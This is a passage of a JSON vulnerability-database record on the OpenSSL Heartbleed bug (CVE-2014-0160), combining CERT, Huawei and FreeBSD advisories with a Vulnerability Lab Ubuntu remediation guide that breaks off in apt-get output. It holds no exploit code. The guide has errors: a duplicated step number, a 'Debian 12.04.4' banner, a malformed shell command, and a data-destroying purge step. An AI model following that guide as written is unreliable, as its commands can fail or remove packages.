<http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts->\n * <http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html>\n * <http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/>\n * <https://www.cert.fi/en/reports/2014/vulnerability788210.html>\n * <http://xkcd.com/1354/>\n * <https://code.google.com/p/mod-spdy/issues/detail?id=85>\n * <http://www.exploit-db.com/exploits/32745/>\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <http://www.freshports.org/security/openssl/>\n * <https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>\n\n### Credit\n\nThis vulnerability was reported by OpenSSL, who in turn credits Riku, Antti and Matti at Codenomicon and Neel Mehta of Google Security. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0160](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>) \n---|--- \n**Date Public:** | 2014-04-07 \n**Date First Published:** | 2014-04-08 \n**Date Last Updated: ** | 2016-05-13 15:26 UTC \n**Document Revision: ** | 177 \n", "reporter": "CERT", "published": "2014-04-08T00:00:00", "type": "cert", "title": "OpenSSL TLS heartbeat extension read overflow discloses sensitive information", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.cert.CertBulletin", "modified": "2016-05-13T15:26:00", "id": "VU:720951", "href": "https://www.kb.cert.org/vuls/id/720951", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "huawei": [{"lastseen": "2016-09-05T13:35:28", "references": [], "edition": 1, "description": "Some OpenSSL software versions used in multiple Huawei products have the following OpenSSL vulnerability. Unauthorized remote attackers can dump 64 Kbytes of memory of the connected server or client in each attack. The leaked memory may contain sensitive information, such as passwords and private keys (Vulnerability ID: HWPSIRT-2014-0414).\u00a0\nThis Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2014-0160.", "reporter": "Huawei Technologies", "published": "2014-04-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "huawei", "title": "Security Advisory-OpenSSL Heartbeat Extension vulnerability (Heartbleed bug) on Huawei multiple products", "bulletinFamily": "software", "affectedSoftware": [{"name": "UPS5000", "version": "V100R001C00/C01/C10/C02\n V100R002C00/C01/C02/C03\n V100R002C10/C11/C12/C13", "operator": "eq"}, {"name": "Fusioncube", "version": "V100R002C00\n V100R002C01", "operator": "eq"}, {"name": "CRM", "version": "CC&BM V100R002C61\n CC&BM V100R002C62\n CC&BM V100R002C72\n Wimax BOSS V100R001C01", "operator": "eq"}, {"name": "Mobile phone Y300", "version": "Y300-0100 V100R001C00B197", "operator": "eq"}, {"name": "Tecal E9000 Chassis", "version": "V100R001", "operator": "eq"}, {"name": "EDC Solution", "version": "V100R001C01", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R001C01\n V100R001C02", "operator": "eq"}, {"name": "UPS2000", "version": "V1R1C00/C10/C11/C30/C31", "operator": "eq"}, {"name": "WebLMT of eNodeb(FDD)", "version": "BTS3900 V100R009C00", "operator": "eq"}, {"name": "iManager M2000", "version": "iManager\u00a0 M2000 V200R013C00SPC230\n iManager M2000 V200R013C00HP2301", "operator": "eq"}, {"name": "Tecal E6000 Chassis", "version": "V100R001C00", "operator": "eq"}, {"name": "RCS9880", "version": "V100R002C10\n V100R003C00", "operator": "eq"}, {"name": "CCE3.0", "version": "CCE V100R003C00", "operator": "eq"}, {"name": "iManager PRS", "version": "iManager PRS V100R014C00SPC100", "operator": "eq"}, {"name": "Tecal RH5885 V2", "version": "V100R001\n V100R003", "operator": "eq"}, {"name": "eSDK Solution", "version": "V100R002C01", "operator": "eq"}, {"name": "VGS SCG", "version": "V500R005C30", "operator": "eq"}, {"name": "Tecal RH2288H V2", "version": "V100R002C00", "operator": "eq"}, {"name": "BCM", "version": "BCM V300R003C01\n BCM V300R003C30", "operator": "eq"}, {"name": "NODEB", "version": "BTS3900 V100R009C00", "operator": "eq"}, {"name": "Tecal RH2285 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "eSpace UC", "version": "V200R001C50", "operator": "eq"}, {"name": "NGIN", "version": "SNE V300R002C20\n SNE V300R002C30\n SNE V300R002C40\n SNE V300R002C50", "operator": "eq"}, {"name": "IMS", "version": "IMS V200R010C00", "operator": "eq"}, {"name": "STB", "version": "V100R002C15LLNL72\n V100R002C15LSCD81\nV100R001C06LCOE01SPC200", "operator": "eq"}, {"name": "IDC Solution", "version": "V100R001C01", "operator": "eq"}, {"name": "OnlineMediation", "version": "OnlineMediationV300R003C01\n OnlineMediationV300R003C02\n OnlineMediationV300R003C21\n OnlineMediationV300R003C30", "operator": "eq"}, {"name": "SAG", "version": "V200R001C38", "operator": "eq"}, {"name": "WebLMT of BSC6910", "version": "BSC6910 V100R016C00", "operator": "eq"}, {"name": "IDC Solution", "version": "V100R001C03", "operator": "eq"}, {"name": "Tecal RH5885 V3", "version": "V100R003", "operator": "eq"}, {"name": "WebLMT of BSC6900", "version": "BSC6900 V100R016C00", "operator": "eq"}, {"name": "PDSN9660", "version": "GGSN9811 V900R008C01\n UGW9811 V900R001C03\n UGW9811 V900R001C05\n UGW9811 V900R009C01\n UGW9811 V900R009C02\n UGW9811 V900R010C00\n UGW9811 V900R010C01\n UGW9811 V900R010C72\n UGW9811 V900R010C81\n HA9661 V900R007C06\n PDSN9660 V900R007C02\n PDSN9660 V900R007C03\n PDSN9660 V900R007C05\n PDSN9660 V900R007C06\n WASN9770 V300R003C01\n WASN9770 V300R003C02", "operator": "eq"}, {"name": "PCCS", "version": "PowerCube1000 V300R002C03\n PowerCube Controller Software V300R002C00/C10/C20C/C30", "operator": "eq"}, {"name": "SOFTX3000", "version": "V600R012C10", "operator": "eq"}, {"name": "Tecal RH2288 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "PRM", "version": "PRM V300R001C08\n PRM V300R001C20", "operator": "eq"}, {"name": "ECC500", "version": "V600R001C00", "operator": "eq"}, {"name": "Smart Campaign", "version": "V300R003C02", "operator": "eq"}, {"name": "SMU02B SMU", "version": "V300R002C02\n V300R002C10", "operator": "eq"}, {"name": "Tecal X6000", "version": "V100R002", "operator": "eq"}, {"name": "USN9810", "version": "V900R012C01", "operator": "eq"}, {"name": "CBS", "version": "CBS V300R003C01\n CBS V100R002C02", "operator": "eq"}, {"name": "eLTE Broadband Access", "version": "eCNS600 V100R001C00\n eCNS600 V100R002C00", "operator": "eq"}, {"name": "FusionSphere", "version": "V100R003C00", "operator": "eq"}, {"name": "Tecal RH2485 V2", "version": "V100R002", "operator": "eq"}, {"name": "NGIN", "version": "BMP V100R002C30\n BMP V100R002C40", "operator": "eq"}, {"name": "HyperDP", "version": "OceanStor N8500 V200R001C91", "operator": "eq"}, {"name": "eSpace Meeting Portal", "version": "V100R001C00", "operator": "eq"}, {"name": "Mobile phone U8686", "version": "V100R001C85B177/B187", "operator": "eq"}, {"name": "Mobile phone C8813", "version": "V100R001C92B173", "operator": "eq"}, {"name": "Policy Center", "version": "V100R003C00", "operator": "eq"}, {"name": "MSOFTX3000", "version": "MSOFTX3000 V200R010C10", "operator": "eq"}, {"name": "UAC3000", "version": "V100R003C00", "operator": "eq"}, {"name": "FusionCloud Desktop Solution", "version": "V100R003C00", "operator": "eq"}, {"name": "WASN9770", "version": "GGSN9811 V900R008C01\n UGW9811 V900R001C03\n UGW9811 V900R001C05\n UGW9811 V900R009C01\n UGW9811 V900R009C02\n UGW9811 V900R010C00\n UGW9811 V900R010C01\n UGW9811 V900R010C72\n UGW9811 V900R010C81\n HA9661 V900R007C06\n PDSN9660 V900R007C02\n PDSN9660 V900R007C03\n PDSN9660 V900R007C05\n PDSN9660 V900R007C06\n WASN9770 V300R003C01\n WASN9770 V300R003C02", "operator": "eq"}, {"name": "AHR", "version": "V100R003C00SPC350 and later versions", "operator": "eq"}, {"name": "Mediation", "version": "Mediation V100R002C20\n Mediation V100R002C30", "operator": "eq"}, {"name": "Tecal RH1288 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "OCS", "version": "OCS V100R002C01\n OCS V300R003C01", "operator": "eq"}, {"name": "NetCol ACC", "version": "V100R001C10/C20/C30", "operator": "eq"}, {"name": "UPCC", "version": "UPCC V300R006C01\n UPCC V300R006C02", "operator": "eq"}, {"name": "eSpace desktop", "version": "V200R001", "operator": "eq"}, {"name": "eLTE Broadband Access", "version": "eSight V300R001C10", "operator": "eq"}, {"name": "OIC", "version": "V100R001C00SPC300\n V100R001C00SPC400", "operator": "eq"}, {"name": "PDU8000", "version": "V100R002C00", "operator": "eq"}, {"name": "MBTS", "version": "BTS3900 V100R009C00", "operator": "eq"}, {"name": "HyperDP", "version": "OceanStor N8500V200R001C09", "operator": "eq"}, {"name": "CSP", "version": "V600R005C10\n V600R005C11SPC100", "operator": "eq"}, {"name": "Mobile phone G510", "version": "G510-0200 V100R001C00B193", "operator": "eq"}, {"name": "SPS", "version": "V300R007C00", "operator": "eq"}, {"name": "eSight", "version": "V200R003C00\n V200R003C01\n V200R003C10\n V300R001C10\n V300R001C00", "operator": "eq"}, {"name": "eSpace IVS", "version": "V100R001C02", "operator": "eq"}, {"name": "eBIMS", "version": "V100R001C00SPC100", "operator": "eq"}, {"name": "ISOP", "version": "V200R001C00", "operator": "eq"}, {"name": "Nastar", "version": "GENEX Nastar V600R014C00SPC201T\n GENEX Nastar V600R014C00", "operator": "eq"}, {"name": "WFM", "version": "V100R001C01", "operator": "eq"}, {"name": "OpenEye CMS", "version": "V300R001C60SPC001", "operator": "eq"}, {"name": "Tecal RH2285H V2", "version": "V100R002C00", "operator": "eq"}, {"name": "WebeGBTS", "version": "BTS3900 V100R009C00", "operator": "eq"}, {"name": "iManager U2000", "version": "iManager U2000 V100R009C00SPC300", "operator": "eq"}, {"name": "CPS", "version": "CPS V100R001C10\n CPS V100R001C20", "operator": "eq"}, {"name": "HA9661", "version": "GGSN9811 V900R008C01\n UGW9811 V900R001C03\n UGW9811 V900R001C05\n UGW9811 V900R009C01\n UGW9811 V900R009C02\n UGW9811 V900R010C00\n UGW9811 V900R010C01\n UGW9811 V900R010C72\n UGW9811 V900R010C81\n HA9661 V900R007C06\n PDSN9660 V900R007C02\n PDSN9660 V900R007C03\n PDSN9660 V900R007C05\n PDSN9660 V900R007C06\n WASN9770 V300R003C01\n WASN9770 V300R003C02", "operator": "eq"}, {"name": "EVC3.3", "version": "EVC V300R003C02", "operator": "eq"}, {"name": "iManager U2000-M", "version": "iManager U2000 V200R014C00SPC100\n iManager U2000 V200R014C00SPC110", "operator": "eq"}, {"name": "DWH", "version": "V100R002C10\n V100R002C30", "operator": "eq"}, {"name": "SANEX", "version": "V100R002C00", "operator": "eq"}, {"name": "UGC3200", "version": "UGC3200 V200R010C00", "operator": "eq"}, {"name": "CTI", "version": "V300R005C50\n V300R006C30", "operator": "eq"}, {"name": "WebLMT of eNodeb(TDD)", "version": "BTS3900 V100R009C00", "operator": "eq"}, {"name": "WFM", "version": "V200R001C00", "operator": "eq"}, {"name": "Tecal E6000", "version": "V100R002", "operator": "eq"}, {"name": "Billing V5R5", "version": "CBS V500R005C21", "operator": "eq"}, {"name": "Tecal X8000", "version": "V100R001", "operator": "eq"}, {"name": "HSS9860", "version": "HSS9860 V900R008C20", "operator": "eq"}, {"name": "GGSN9811", "version": "GGSN9811 V900R008C01\n UGW9811 V900R001C03\n UGW9811 V900R001C05\n UGW9811 V900R009C01\n UGW9811 V900R009C02\n UGW9811 V900R010C00\n UGW9811 V900R010C01\n UGW9811 V900R010C72\n UGW9811 V900R010C81\n HA9661 V900R007C06\n PDSN9660 V900R007C02\n PDSN9660 V900R007C03\n PDSN9660 V900R007C05\n PDSN9660 V900R007C06\n WASN9770 V300R003C01\n WASN9770 V300R003C02", "operator": "eq"}, {"name": "UGW9811", "version": "GGSN9811 V900R008C01\n UGW9811 V900R001C03\n UGW9811 V900R001C05\n UGW9811 V900R009C01\n UGW9811 V900R009C02\n UGW9811 V900R010C00\n UGW9811 V900R010C01\n UGW9811 V900R010C72\n UGW9811 V900R010C81\n HA9661 V900R007C06\n PDSN9660 V900R007C02\n PDSN9660 V900R007C03\n PDSN9660 V900R007C05\n PDSN9660 V900R007C06\n WASN9770 V300R003C01\n WASN9770 V300R003C02", "operator": "eq"}, {"name": "IDS2000", "version": "V300R001C11/C12/C31/C32", "operator": "eq"}], "cvelist": ["CVE-2014-0160"], "modified": "2015-03-11T00:00:00", "id": "HUAWEI-SA-20140417-HEARTBLEED", "href": "http://www.huawei.com/en/psirt/security-advisories/2015/hw-332187", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:51", "references": ["https://www.openssl.org/news/vulnerabilities.html#2014-0076", "https://www.openssl.org/news/secadv_20140407.txt", "http://www.heartbleed.com"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "10.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1_10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openssl", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openssl", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mingw32-openssl", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1g", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mingw32-openssl", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "10.0_1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "operator": "lt"}], "description": "\nOpenSSL Reports:\n\nA missing bounds check in the handling of the TLS heartbeat extension can be\n\t used to reveal up to 64k of memory to a connected client or server.\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately\n\t upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n\nThe bug allows anyone on the Internet to read the memory of the\n\t systems protected by the vulnerable versions of the OpenSSL software.\n\t This compromises the secret keys used to identify the service\n\t providers and to encrypt the traffic, the names and passwords of the\n\t users and the actual content. This allows attackers to eavesdrop\n\t communications, steal data directly from the services and users and\n\t to impersonate services and users.\n\n\nThe code used to handle the Heartbeat Extension does not do\n\t sufficient boundary checks on record length, which allows reading\n\t beyond the actual payload.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-04-07T00:00:00", "title": "OpenSSL -- Remote Information Disclosure", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-11T00:00:00", "id": "5631AE98-BE9E-11E3-B5E3-C80AA9043978", "href": "https://vuxml.freebsd.org/freebsd/5631ae98-be9e-11e3-b5e3-c80aa9043978.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "vulnerlab": [{"lastseen": "2018-08-31T00:11:44", "references": [], "description": "", "edition": 3, "reporter": "Vulnerability Laboratory [Research Team]", "published": "2014-04-09T00:00:00", "title": "HeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu", "type": "vulnerlab", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "VULNERLAB:1254", "href": "http://www.vulnerability-lab.com/get_content.php?id=1254", "sourceData": "Document Title:\r\n===============\r\nHeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2014-04-09\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1254\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nHow to Fix the HeartBleed SSL Vulnerability (CVE-2014-0160) in Ubuntu with 10 easy steps!\r\n\r\n1. First we login via terminal console to the ssh port (22)\r\n2. Now, we use sudo or su to auth to work with root privileges\r\n3. After the privileges upgrade to root we type `apt-get update` to update all installed core packages\r\n4. Next command is `apt-get upgrade` to upgrade the already installed linux software packages\r\n5. Now, we reboot the system with the following basic command `sudo reboot`\r\n6. After the startup we access the server again via ssh client to port 22\r\n7. We install the development package and upgrade the library itself via the following terminal command `sudo apt-get install openssl libssl-dev`\r\n7. As next command we type in the command line `openssl version` (1.0.1) to review the newst installed version and package name\r\n9. The following 2 commands shows all affected services that need to be restarted `ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE `/libssl.so.* (deleted)` {} ; | cut -d/ -f3 | sort -u)`\r\nor still running `ls -l /proc/*/fd | grep ssl.*(deleted)`\r\n10. Last step is to reboot by usage of the basic `sudo reboot` to ensure the updates and upgrades was successful\r\n\r\n\r\n\r\nMay delete or overwirte important exisiting data\r\napt-get purge openssl\r\n\r\nClean the system automatically\r\napt-get autoremove && apt-get autoclean\r\n\r\nDownload and compile the newst version of openssl\r\nwget https://www.openssl.org/source/openssl-1.0.1g.tar.gz\r\n\r\nInspect what is causing an error to pin - Old Repository & Co.\r\napt-cache policy openssl libssl-dev\r\n\r\nNote: Remember that a verified certificate needs to be revoked to generate a new after a compromise.\r\n\r\n\r\n------------- Reboot\r\nanalyst-updater@h2072833:~#\r\nlogin as: analyst-updater\r\nanalyst-updater@h2072833.ben-kenobi-server.net\\'s password:\r\nWelcome to Debian 12.04.4 (GNU/Linux x86_64)\r\nLast login: Wed Apr 9 12:00:55 2014 from xxx.dip0.ipconnect.com\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\n\r\nanalyst-updater@h2072833:~# apt-get update\r\nHit ftp://ftp.ben-kenobi-server.net precise Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe TranslationIndex\r\nGet:1 ftp://ftp.ben-kenobi-server.net precise/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-de\r\nGet:2 ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-de\r\nGet:3 ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-de\r\nGet:4 ftp://ftp.ben-kenobi-server.net precise/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-de\r\nGet:5 ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-de\r\nGet:6 ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-de\r\nGet:7 ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-de\r\nGet:8 ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-de\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Translation-en\r\nFetched 368 kB in 0s (808 kB/s)\r\nReading package lists... Done\r\n\r\nanalyst-updater@h2072833:~# apt-get upgrade\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... Done\r\n0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nAfter this operation, 0 B of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\n apache2 apache2-mpm-prefork apache2-prefork-dev apache2-utils apache2.2-bin\r\n apache2.2-common ca-certificates clamav clamav-base clamav-freshclam file\r\n icedtea-6-jre-cacao icedtea-6-jre-jamvm ifupdown initramfs-tools\r\n initramfs-tools-bin libapache2-mod-php5 libclamav6 libgtk-3-0 libgtk-3-bin\r\n libgtk-3-common libgudev-1.0-0 libgudev-1.0-0:i386 libmagic1 libnss3\r\n libnss3:i386 libnss3-1d libpq-dev libpq5 librsvg2-2:i386\r\n librsvg2-common:i386 libssl-dev libssl-doc libssl1.0.0 libssl1.0.0:i386\r\n libudev0 libudev0:i386 linux-firmware openjdk-6-jre-headless\r\n openjdk-6-jre-lib openssh-client openssh-server openssl php5 php5-cgi\r\n php5-cli php5-common php5-curl php5-gd php5-mysql php5-sqlite php5-xsl\r\n postgresql-9.1 postgresql-client-9.1 sudo tzdata tzdata-java udev udisks\r\n59 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nNeed to get 108 MB of archives.\r\nAfter this operation, 4,201 kB of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\nGet:1 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d oc all 1.0.1-4ubuntu5.12 [1,032 kB]\r\nGet:2 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d ev amd64 1.0.1-4ubuntu5.12 [1,575 kB]\r\nGet:3 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 i386 1.0.1-4ubuntu5.12 [1,009 kB]\r\nGet:4 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 amd64 1.0.1-4ubuntu5.12 [1,048 kB]\r\nGet:5 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 i386 175-0ubuntu9.5 [32.1 kB]\r\nGet:6 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 amd64 175-0ubuntu9.5 [28.4 kB]\r\nGet:7 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -bin amd64 3.4.2-0ubuntu0.7 [15.9 kB]\r\nGet:8 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -0 amd64 3.4.2-0ubuntu0.7 [2,285 kB]\r\nGet:9 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -common all 3.4.2-0ubuntu0.7 [145 kB]\r\nGet:10 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 i386 1:175-0ubuntu9.5 [14.6 kB]\r\nGet:11 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 amd64 1:175-0ubuntu9.5 [14.5 kB]\r\nGet:12 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 -1d amd64 3.15.4-0ubuntu0.12.04.2 [13.4 kB]\r\nGet:13 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 i386 3.15.4-0ubuntu0.12.04.2 [1,292 kB]\r\nGet:14 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 amd64 3.15.4-0ubuntu0.12.04.2 [1,229 kB]\r\nGet:15 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-common i386 2.36.1-0ubuntu1.1 [20.3 kB]\r\nGet:16 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-2 i386 2.36.1-0ubuntu1.1 [109 kB]\r\nGet:17 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main file am d64 5.09-2ubuntu0.3 [19.7 kB]\r\nGet:18 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libmagi c1 amd64 5.09-2ubuntu0.3 [217 kB]\r\nGet:19 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata- java all 2014a-0ubuntu0.12.04 [126 kB]\r\nGet:20 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata all 2014a-0ubuntu0.12.04 [448 kB]\r\nGet:21 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cg i amd64 5.3.10-1ubuntu3.11 [6,104 kB]\r\nGet:22 